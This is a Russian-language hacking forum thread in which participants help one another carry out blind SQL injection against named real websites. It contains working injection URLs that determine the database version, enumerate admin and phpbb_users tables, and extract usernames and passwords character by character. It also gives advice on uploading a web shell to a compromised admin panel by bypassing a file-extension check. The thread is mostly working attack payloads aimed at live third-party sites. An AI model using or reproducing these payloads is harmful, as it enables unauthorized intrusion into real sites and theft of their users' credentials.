Еще вопросег =) http://www.check6gaming.com/news.php?id=67+GROUP+BY+100+-- пробовл все, вплоть до 0 - сначала ишед Unknown column, а когда подставляю 1 или 0 - Can't group on 'count(*)' Что я делаю не так?
вот что смог определить Code: http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5 5 версия мускула
Гм, интеренсо... А продробней не расскажешь, как определял - какие промежуточные действия были до hand+substring(@@version,1,1)=5
wildshaman Использовал подзапросы, посимвольный перебор читай _www.abc-it.lv/index.php/id/715 промежуточные действия substring(@@version,1,1)=3 substring(@@version,1,1)=4 substring(@@version,1,1)=5 5 возвращает true. Значит версия пятая. Так же можешь перебрать user,database и т.д.
вот имеется наш урл: Code: http://www.check6gaming.com/news.php?id=67 для теста на inj проверяем Code: http://www.check6gaming.com/news.php?id=67+and+1=1 выводится тот же запрос,что и при id=67 определяем версию: substring(@@version,1,1)=4 первый символ сравниваем с 4, если 4 версия то отобразиться такая же странцица как и при id=67 наконец запрос Code: http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5 не выдает ошибки, соответственно версия мускула = 5
Если слепую крутить, то и кол-во столбцов не нужно. Code: http://www.check6gaming.com/news.php?id=67+and+substring((select+table_name+from+information_schema.tables+limit+17,1),1,18)='fp_accomplishments'
хай Есть скуль на сайте база MSSQL ввожу index.cfm?page=search&[email protected]&searchtype=@@version или (select+system_user) все нормально выводит но как только пытаюсь вывести имена таблиц, страница просто перезагружается, не каких ошибок и прочего В чем трабла? как вывести имена таблиц и колонок?
2 wildshaman: http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((SELECT+password+from+mysql.user+WHERE+user='root'),1,1))) А таблицы можешь так подбирать: http://www.check6gaming.com/admin.php?name=67+AND+ascii(lower(substring(CONCAT_WS(0x3a,(select+name+from+admin+LIMIT+0,1),(select+name+from+admin+LIMIT+1,1),(select+name+from+admin+LIMIT+2,1)),1,1)))=97
спс, но во втором случае пишед ошибку 404 нот фаунд (пробелы убрал), а в первом - SELECT command denied to user 'check6ga_root'@'localhost' for table 'user' =(
Взломал сайт, получил доступ в админку, пытаюсь залить шелл-проверяется расширение файла (только jpg or gif) file_priv отключён, доступа к mysql.user нет, только в админку. Думается, что shell.php.jpg заливать смысла нет ))... Как быть? Подскажите плз. Слышал, кто то говорил что как то проинклудить можно. В общем поделитесь соображениями и опытом.
2 wildshaman: http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS(0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+2,1)),1,1)))=97
Если проверяеться только расширения, но не сам факт что это картинка попробуй null байт, shell.php%00.jpg, если проверяеться сам факт что это картинка, то запихни в маленку картинку, например в .gif код шелла, и посмотри что бы валидно открывалась картинка и попробуй то же самое, а вообше че за админка? Паблик движок или самопис?
Это ты показал какие ибические конструкции можно делать , или как? Помоему к сайту это не имеет никакого отношения, и он достаточно ясно об этом сообщает 2 wildshaman Смотри запрос который дал R1dex на предыдущей странице
гы, я не спорю, похоже на бред, конечно, но есть разница таки между: http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS(0x3a,(select+id+from+fp_accomplishments+LIMIT+0,1),(select+id+from+fp_accomplishments+LIMIT+1,1),(select+id+from+fp_accomplishments+LIMIT+2,1)),1,1)))=49 и http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS(0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+2,1)),1,1)))=49 насколько я понимаю, так можно брутить сразу по ЦЕЛОМУ названию таблицы, а не посимвольно, т.к. ошибки совершенно разные и однозначно различаемые. Ну ,конечно, данный способ не для 5-ой ветки) Но blind-sql-inj есть не только в пятой ветке
да, в принципе ты прав, но, в concat_ws если у тебя первый запрос вернет error то остальные выполняться не будут, то есть, что я хочу сказать, там есть check6ga_forums.phpbb_users и http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS(0x3a,(select+id+from+admin+LIMIT+0,1),(select+user_password+from+phpbb_users+LIMIT+1,1),(select+user_password+from+phpbb_users+LIMIT+1,1)),1,1)))=97 нам будет возврашено Table 'check6ga_forums.admin' doesn't exist, потому как первый запрос в concat_ws вернул error остальные запросы в concat_ws не выполнились, поэтому использования 3 запросов в concat_ws без смыслено.
не могу не согласиться, туплю чото сегодня по черному. + проверка: http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+id+from+admin),1,1)))=49 найденная таблица (и уже случайно колонка): http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+id+from+phpbb_users),1,1)))=49 брут колонок из phpbb_users : http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+user+from+phpbb_users),1,1)))=49 сбрутилась еще одна: http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+username+from+phpbb_users),1,1)))=49 ну в общем стандартные колонки из форума phpbb, значит есть поле и user_password: http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+user_password+from+phpbb_users),1,1)))=49 Далее понятно но все таки напишу: ищем ник 1 пользователя в базе: проверяем на 1-ую буковку 'a': http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+username+from+phpbb_users+limit+0,1),1,1)))=97 угадали, отлично, проверяем вторую букву далее по алфавиту: http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+username+from+phpbb_users+limit+0,1),2,1)))=98 не подходит, и так дошлепали до 110, буква 'n': http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+username+from+phpbb_users+limit+0,1),2,1)))=110 на всякий случай проверяем нашу догадку: http://www.check6gaming.com/news.php?id=67+AND+substring((select+username+from+phpbb_users+limit+0,1),1,2)='an' значит всё верно. И так бомбим до победного конца. Тоже самое с user_password
2 wildshaman: ещё слепые inj: Code: http://www.trunov.com/content.php?act=showcat&id=11+and+substring(@@version,1,1)=4 Code: http://www.sisterstates.com/statetaxforms.php?id=11+and+substring(@@version,1,1)=4 версия мускула = 4
